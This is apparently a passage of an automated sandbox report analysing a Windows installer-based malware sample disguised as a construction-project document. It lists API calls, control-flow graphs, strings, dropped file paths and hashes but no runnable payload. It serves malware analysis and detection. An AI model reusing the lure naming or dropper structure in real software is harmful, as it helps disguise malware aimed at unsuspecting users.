                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID: 8WB$C:\Users\user\AppData\Local\Temp\nsbA563.tmp
                                                                                                                          • API String ID: 2295610775-2094805136
                                                                                                                          • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                                          • Instruction ID: 1ee065d6e3812395a970a313fce2833205c85b6b9f4a8d8b1e1fbb38817291b4
                                                                                                                          • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                                                                                          • Instruction Fuzzy Hash: BED0123198A030EBC20067786D0CC4B7A989B553317514ABAF426F63E0C7389C65969D
                                                                                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                                            • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                                            • Part of subcall function 00405234: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,00000000,00000000,00000000), ref: 0040528F
                                                                                                                            • Part of subcall function 00405234: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll), ref: 004052A1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                                            • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                                            • Part of subcall function 00405703: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                                            • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
                                                                                                                          • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3585118688-0
                                                                                                                          • Opcode ID: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                                                                                          • Instruction ID: a183927f8f084cdb8571cb7bd96d2202481db38f7d29b0955d5094ceef348c04
                                                                                                                          • Opcode Fuzzy Hash: 02fa1bc128315b3629317a3bcc306fe2355556fdb58621b14dfff1a53f7edb22
                                                                                                                          • Instruction Fuzzy Hash: EB116171900104EBCF109FA0CD459DF7AB5EB44359F20447BE501B61E1C3794A92DFAA
                                                                                                                          Function 004065E1 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                                          • Instruction ID: de185f48d860fff5590de95dd02018db6e9577308a0edf9c34ceb3d093010d57
                                                                                                                          • Opcode Fuzzy Hash: 05c614c4f20a384ebef59dc8ddd16a5626e9342178c9d40e40815452f54a0124
                                                                                                                          • Instruction Fuzzy Hash: A7F18870D00269CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A96CF44
                                                                                                                          Function 004062F6 Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 310444273-0
                                                                                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                          • Instruction ID: 0f2d4e1e99ce60b709eb5bed4958ea521979334ca76cdededd91ec650e447dd0
                                                                                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                          • Instruction Fuzzy Hash: D5E0C236A08120ABC7124B209D48D6B77ACEFE9601305043AF906F6281D774AC229BE9
                                                                                                                          Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 178 403e73-403e88 175->178 179 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->179 176->175 177 403ce6-403cef 176->177 180 403cf1-403cfe SetWindowPos 177->180 181 403d04-403d07 177->181 183 403ec8-403ecd call 4041e6 178->183 184 403e8a-403e8d 178->184 179->178 180->181 186 403d21-403d27 181->186 187 403d09-403d1b ShowWindow 181->187 192 403ed2-403eed 183->192 189 403ec0-403ec2 184->189 190 403e8f-403e9a call 401389 184->190 193 403d43-403d46 186->193 194 403d29-403d3e DestroyWindow 186->194 187->186 189->183 191 404167 189->191 190->189 211 403e9c-403ebb SendMessageW 190->211 199 404169-404170 191->199 197 403ef6-403efc 192->197 198 403eef-403ef1 call 40140b 192->198 202 403d48-403d54 SetWindowLongW 193->202 203 403d59-403d5f 193->203 200 404144-40414a 194->200 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->191 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->191 213 404154-40415d ShowWindow 205->213 207->208 214 403f13-403f60 call 405fae call 40419a * 3 GetDlgItem 207->214 208->200 209->199 215 403d95-403d98 210->215 216 403d78-403d8f SendMessageW IsWindowEnabled 210->216 211->199 213->191 244 403f62-403f67 214->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 214->245 219 403d9a-403d9b 215->219 220 403d9d-403da0 215->220 216->191 216->215 221 403dcb-403dd0 call 404173 219->221 222 403da2-403da8 220->222 223 403dae-403db3 220->223 221->209 225 403de9-403dfc SendMessageW 222->225 226 403daa-403dac 222->226 223->225 227 403db5-403dbb 223->227 225->209 226->221 230 403dd2-403ddb call 40140b 227->230 231 403dbd-403dc3 call 40140b 227->231 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->221 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f8c lstrlenW call 405fae SetWindowTextW call 401389 251->253 252->253 253->192 262 40403a-40403c 253->262 262->192 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->191 266 404054-40405a 265->266 266->192 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->191 269->191 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                                                                                          APIs
                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                                                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                                                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                                                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                                                                                          • SendMessageW.USER32(?,?,00000000,00000001), ref: 00403FD3
                                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                                                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                                                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                          • String ID: &B
                                                                                                                          • API String ID: 3282139019-3208460036
                                                                                                                          • Opcode ID: d331890cd791021983203c44155cc69af11bbce5f8b1e17c8e6a12c02c090248
                                                                                                                          • Instruction ID: 96835d82c370a0a6a0181c3c86cda1860f3d4ae5ef3a20f552a9e9ef927ba2a4
                                                                                                                          • Opcode Fuzzy Hash: d331890cd791021983203c44155cc69af11bbce5f8b1e17c8e6a12c02c090248
                                                                                                                          • Instruction Fuzzy Hash: DEC1B371A04200BBDB206F61ED49E3B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                                                                                          Function 0040391F Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 277 40391f-403937 call 4062f6 280 403939-403949 call 405ed3 277->280 281 40394b-403982 call 405e59 277->281 290 4039a5-4039ce call 403bf5 call 405adf 280->290 286 403984-403995 call 405e59 281->286 287 40399a-4039a0 lstrcatW 281->287 286->287 287->290 295 403a60-403a68 call 405adf 290->295 296 4039d4-4039d9 290->296 302 403a76-403a9b LoadImageW 295->302 303 403a6a-403a71 call 405fae 295->303 296->295 297 4039df-403a07 call 405e59 296->297 297->295 304 403a09-403a0d 297->304 306 403b1c-403b24 call 40140b 302->306 307 403a9d-403acd RegisterClassW 302->307 303->302 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 405a04 304->309 318 403b26-403b29 306->318 319 403b2e-403b39 call 403bf5 306->319 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 316 403a53-403a5b call 4059d7 call 405f8c 308->316 317 403a2d-403a3b lstrcmpiW 308->317 309->308 310->306 314 403bed-403bf4 311->314 316->295 317->316 322 403a3d-403a47 GetFileAttributesW 317->322 318->314 330 403bc2-403bc3 call 405307 319->330 331 403b3f-403b5c ShowWindow LoadLibraryW 319->331 325 403a49-403a4b 322->325 326 403a4d-403a4e call 405a23 322->326 325->316 325->326 326->316 335 403bc8-403bca 330->335 332 403b65-403b77 GetClassInfoW 331->332 333 403b5e-403b63 LoadLibraryW 331->333 336 403b79-403b89 GetClassInfoW RegisterClassW 332->336 337 403b8f-403bb2 DialogBoxParamW call 40140b 332->337 333->332 338 403be4-403be6 call 40140b 335->338 339 403bcc-403bd2 335->339 336->337 343 403bb7-403bc0 call 40386f 337->343 338->311 339->318 341 403bd8-403bdf call 40140b 339->341 341->318 343->314
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004062F6: GetModuleHandleA.KERNEL32(?,?,?,0040339D,00000009), ref: 00406308
                                                                                                                            • Part of subcall function 004062F6: LoadLibraryA.KERNELBASE(?,?,?,0040339D,00000009), ref: 00406313
                                                                                                                            • Part of subcall function 004062F6: GetProcAddress.KERNEL32(00000000,?), ref: 00406324
                                                                                                                          • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000,"C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"), ref: 004039A0
                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\incontemptible\koput,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\incontemptible\koput), ref: 00403A87
                                                                                                                            • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                                                                                          • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403ADC
                                                                                                                          • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                                                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964868103.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                          • String ID: "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\incontemptible\koput$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                                                          • API String ID: 914957316-1031471537
                                                                                                                          • Opcode ID: 3fe1317be8225d5207d3262feaceadd220e403ae806b79703d05bab37dc2ed14
                                                                                                                          • Instruction ID: fe5ebf8e7a3d3daaf9cbba1b4cb9a1e73201f421c795aceacce4267b8607b26b
                                                                                                                          • Opcode Fuzzy Hash: 3fe1317be8225d5207d3262feaceadd220e403ae806b79703d05bab37dc2ed14
                                                                                                                          • Instruction Fuzzy Hash: EB61A370644200BED720AF669C46F2B3A6CEB84749F40453FF945B62E2D7786902CA3E
                                                                                                                          Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bf8 351 402e16-402e44 call 405f8c call 405a23 call 405f8c GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 406412 call 405c27 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 377 402e80-402e98 call 405bb3 372->377 378 402efe-402f02 372->378 373->367 382 402f0b-402f11 377->382 393 402e9a-402ea1 377->393 381 402f04-402f0a call 402d1a 378->381 378->382 381->382 389 402f13-402f21 call 4063a4 382->389 390 402f24-402f2e 382->390 389->390 390->360 390->361 393->382 399 402ea3-402eaa 393->399 397->353 408 40300e-403011 398->408 399->382 401 402eac-402eb3 399->401 400->367 400->370 401->382 403 402eb5-402ebc 401->403 403->382 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->382 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->382 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405bb3 415->416 416->353
                                                                                                                          APIs
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,00000400), ref: 00402DEC
                                                                                                                            • Part of subcall function 00405BF8: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00405BFC
                                                                                                                            • Part of subcall function 00405BF8: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1E
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe,80000000,00000003), ref: 00402E35
                                                                                                                          • GlobalAlloc.KERNELBASE(?,00409230), ref: 00402F7C
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, xrefs: 00402DD6, 00402DE5, 00402DF9, 00402E16
                                                                                                                          • soft, xrefs: 00402EAC
                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403013
                                                                                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC5
                                                                                                                          • Null, xrefs: 00402EB5
                                                                                                                          • "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe", xrefs: 00402DC5
                                                                                                                          • Error launching installer, xrefs: 00402E0C
                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402E17, 00402E1C, 00402E22
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC9, 00402F94
                                                                                                                          • Inst, xrefs: 00402EA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1964758426.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1964746569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964771542.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1964784009.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
